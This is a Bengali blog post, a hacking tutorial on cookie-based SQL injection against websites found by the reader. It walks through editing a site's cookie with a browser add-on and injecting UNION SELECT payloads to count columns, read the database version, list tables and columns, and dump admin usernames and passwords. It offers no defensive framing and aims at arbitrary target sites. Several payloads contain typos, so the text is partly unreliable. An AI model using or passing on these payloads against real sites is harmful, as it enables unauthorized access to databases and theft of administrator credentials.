Teachitbd.প্রযুক্তির সাথে সবসময়

Recent Post

Welcome To Teachitbd

ওয়েব সাইটের সর্বশেষ পোষ্ট পেতে লাইক দিন আমাদের ফেসবুক পেইজ এ আর পান প্রতিদিন নতুন নতুন টিপ্স এন্ড টিউটোরিয়াল ।

Follow us

Thursday, October 29, 2015

Cookie Based SQLi টিউটোরিয়াল

তাহলে শুরু করি মুল কাজ।প্রথমে আপনাকে sqli সম্পর্কে ধারনা থাকতে হবে।sqli অনেক ধরনের হয় তার মধ্যে কুকি বেস একটি।
প্রথমে হ্যাকবার অন করে নিন না থাকলে ফাইয়ার ফক্স এর এডন এ গিয়ে ডাওনলোড করুন।অথবা নিচের লিংক এ জান
https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
কাজ শুরু,ধরুন আপনি যে সাইটটি পেলেন সেটার url: http://site.com/cid.php?id=4 এখন আমাদের কাজ হবে ?id=4 এই লেখা টি কেটে দিয়ে। শুধুমাত্র cid.php এই লেখাটি থাকবে Url এ ...
তাহলে URL টি হলো http://site.com/cid.php
তারপর মোজিলা ব্রাউজারের টুলসে গিয়ে Cookie Manager অন করে নিন।Cookie Manager আডন দিয়ে।
এডিট বাটন এ ক্লিক করুন  [ http://prntscr.com/4jtmn9 ]
তারপর রিফ্রেশ করুন [ http://prntscr.com/4jtnav ]
রিফ্রেশ দিলে পেইজটা তে এরর দেখাবে।  এখন  বুঝতে পেরেছেন কমান্ড কিভাবে এক্সিকিউট করতে হবে ।আমাদের প্রথম কাজ হবে সাইটটিতে কয়টা কলাম আছে তা বের করা।এর জন্যে আবার Cookie Manager এ গিয়ে প্রথম স্ক্রিন শট টির মতো সিলেক্ট করে এডিটে ক্লিক করুন।এডিটে ক্লিক করলে ২য় স্ক্রিন শটটির মতো আসবে এখন কনটেন্ট এর জায়গায় লেখুন 4 order by 1-- এবার সেভ লেখায় ক্লিক করে পেইজটি রিলোড দিন কোনো এরর দেখাচ্ছে না আমার ক্ষেত্রে! যায় হোক এভাবে বেসিক SQLi এ যেভাবে করতেন সেভাবে order by এর পরে সংখ্যা বাড়াইতে থাকুন । তবে কুকি ম্যানেজার দিয়ে ! যেটা আমি গত দুইটি স্টেপে দেখিয়েছি। যায় হোক আমি বার বার কিভাবে কমান্ড এক্সিকিউট করতে হয় তা বলবো না কারণ তাহলে টিউটোরিয়ালটি অনেক বড় হয়ে যাবে ।sqli সমন্ধে যাদের ধারনা আছে তারা জানবেন ভালো করে।
এবার আমি order by 3-- পর্যন্ত যাওয়ার পর এরর দেখতে পেলাম ! যার মানে হচ্ছে এই সাইটে কলাম ২টি এখন ভুলনরাবল কলাম বের করার জন্যে কমান্ড দিলাম। union select and 0+1,2-- এখন আমাকে ভুলনরাবল কলাম দেখাবে । এখানে একটি নতুন বিষট লক্ষ্য করুন and 0 অনেক সময় শুধু union select দিলেই রেসাল্ট দেখায় না । সে ক্ষেত্রে এই কমান্ডটি ব্যাবহার করতে পারেন । এই সকল কাজ করবেন কুকি ম্যানেজার দিয়ে ব্রাউজারে কমান্ড দিলে কোনো কাজই হবে না।
***আবার ও বলছি SQLI বেসিক ধারনা না থাকলে এটা না ট্রাই করাই ভালো।****
ধরুন আমি পেলামঃ১ তার মানি আমার টার্গেট করা সাইটের ভুলনরাবল কলাম হচ্ছে ১ । এখন আমি এই কলাম দিয়ে আমার কাঙ্খিত ডাটা ডাম্প করবো প্রথমেই ভার্সন বের করে । আবার কুকি ম্যানেজার অন করে আপনার টার্গেট সাইট টি সিলেক্ট করে এডিটে ক্লিক করুন এবং কনটেন্ট এর জায়গায় কমান্ডটি হবে এরকম
3 union select and 0+version(),2--
এবার সেভ দিয়ে রিফ্রেশ করুন । রেসাল্ট দেখতে পাবেন । যায় হোক । আমার টার ভার্সন ৫ সুতারাং সহজেই SQLi করতে পারবো ।। এবার কুকি ম্যানেজার--আপনার টার্গেট সাইট সিলেক্ট-এডিট--কনটেন্ট এ গিয়ে কমান্ড লেখলাম ।
3 union select and 0+group_concat(table_name),2+from+information_schama.tables+where+table_schema=database()
সেভ এ ক্লিক করে পেইজ রিফ্রেশ করলাম! আমি টেবিলস এর নাম গুলো দেখতে পাচ্ছিঃ
  • admin
  • news
  • about
এই ধরনের ।। এখন আমার কাজ হবে admin টেবিল নিয়ে সুতারাং এবার কমান্ড দিবো । কুকি ম্যানেজার--আপনার টার্গেট সাইট সিলেক্ট-এডিট--কনটেন্ট এ গিয়ে
3 union select and 0+group_concat(columnn_name),2+from+information_schama.columns+where+table_name=Hex value Of Admin
এখন আমরা কলামস দেখতে পেলাম ।
login_user
login_password
এখন আমরা যদি এই কলাম গুলো দেখে ডাটা ডাম্প করতে চায় তাহলে আবার কুকি ম্যানেজার--আপনার টার্গেট সাইট সিলেক্ট-এডিট--কনটেন্ট এ গিয়ে কমান্ড লেখুন
3 union select and 0+group_concat(login_user,0x3a,login_password),2+from+admin--
সেভ করে পেইজ টি রিফ্রেশ করুন    কাজ শেষ এডমিন আইডি এবং পাসওয়ার্ড দেখতে পাবেন।আসা করি বাকি কাজ গুলু নিজেই করতে পারবেন কারন বাকি গুলা বেসিক এর মতই।
নিচের ভিডিওটি দেখতে পারেন।

No comments:

Post a Comment

Comment here